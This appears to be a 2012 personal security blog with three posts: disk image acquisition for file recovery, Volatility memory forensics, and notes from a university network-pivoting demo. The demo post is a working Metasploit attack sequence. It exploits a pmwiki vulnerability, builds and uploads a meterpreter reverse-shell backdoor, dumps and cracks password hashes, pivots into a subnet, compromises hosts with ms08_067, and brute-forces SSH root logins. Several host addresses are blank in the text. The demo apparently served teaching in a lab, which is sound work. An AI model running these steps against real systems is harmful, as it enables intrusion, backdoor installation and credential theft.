Monday, 21 May 2012

Restore files / Image acquisition 101

First of all lets acquire the image of the disk in question so we can recover the files.

Boot your backtrack disk (usb or disk does not matter that much) and load up the Forensics mode (no disk no swap)

Check out to see what disks/partitions we got

dmesg | grep sd

Get the images from both partitions and transfer them to the workstation where you will be doing the work.

dcfldd if=/dev/sda1 | ssh username@hostname "dd of=/path/on/the/remote/machine/image1.img" 

dcfldd if=/dev/sda2 | ssh username@hostname "dd of=/path/on/the/remote/machine/image2.img"

Now lets make the images to VMware disks

qemu-img convert -f raw /storage/data/recover/sda1.img -O vmdk /storage/data/recover/vmware-sda1.vmdk


wget ""

tar -zxvf raw2vmdk-
rm -rf raw2vmdk-
cd  raw2vmdk-

java -jar raw2vmdk.jar /storage/data/recover/sda2.img /storage/data/recover/vmware-sda2.vmdk

Now they can be loaded into VMware and files can be restored using:

Diskdigger (needs licence)
Recuva (free)
FreeRecovereer (free)
File Scavanger (needs licence)

Stay tuned :)

Tuesday, 15 May 2012

UoB pivoting demo

These are the notes from a quick demo I did at the University of Bedfordshire. Enjoy..

  • Open Armitage
  • Scan (nmap) 172.16.128.x and find web server
db_nmap -sT -Pn -T5 -O --open 
  • Find attacks
  • Visit site ( and attack
  • Exploit using CVE-2011-4453  (pmwiki) GUI fail -> use console
use exploit/multi/http/pmwiki_pagelist
set rhost
exploit -j
sessions -v
  • Check out the system (sysinfo,ps,getuid) no hashdump/winenum/route >> php-meterpreter not full functionality so...
  • Create a backdoor
msfpayload windows/x64/meterpreter/reverse_tcp LHOST= LPORT=8443 EXITFUNC=thread X > /root/Tools/runme.exe
  • cat /root/Tools/meh.php
  • Upload both meh.php and runme.exe
lcd /root/Tools
upload meh.php
upload runme.exe
  • Start a listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set exitfunc thread
set lhost
set lport 8443
exploit -j
  • Open a Terminal and
  • Second session now has full system privs
  • Get hashdump
  • Crack with ophcrack
  • Check out routes with ipconfig/route (time to pivot!) 
route add 2
  • Scan subnet using arpscan
run arp_scanner -r
  • Scan hosts using metasploit tcp scanner
  • Locate windows server
  • Locate linux server
  • Compromise windows box
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
exploit -j
  • Take hash and crack with ophcrack
  • Compromise linux box
  • Create a forwarding tunnel to check out the web server
portfwd add -l 8080 -p 80 -r
  • Test php-cgi exploit on it on local browser (http://localhost:8080/configuration.php?-s)
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASSWORD password
run -j

Thats all for now..
Stay tuned :)

Friday, 4 May 2012

Volatility taster

On our Backtrack system lets setup a quick samba to accept the memory dump on
  • apt-get install samba
  • vi /etc/samba/smb.conf (comment all the shares and add just the following)
   comment = btshare 
   path = /btshare 
   read only = no 
   guest ok = yes 
   browsable = yes
save and exit
  • mkdir /btshare
  • chmod 777 /btshare
  • service smbd restart

On our target system open the USB stick that has DEFT in it.
Run deft extra an decide where your audit log will go
Go to Acquire and launch the trusted shell in order to run win32dd or win64dd
  • win64dd /r /f \\\btshare\win7memory.img
  • cd /root/Tools/
  • svn checkout Volatility
  • cd Volatility
  • chmod +x
  • ./ -f /btshare/win7memory.img imageinfo
  • ./ -f /btshare/win7memory.img --profile Win7SP1x64 pslist
  • ./ -f /btshare/win7memory.img --profile Win7SP1x64 connections
  • ./ -f /btshare/win7memory.img --profile Win7SP1x64 connscan
  • ./ -f /btshare/win7memory.img --profile Win7SP1x64 hivescan
  • ./ -f /btshare/win7memory.img --profile Win7SP1x64 hivelist 0x031da010

More to come :)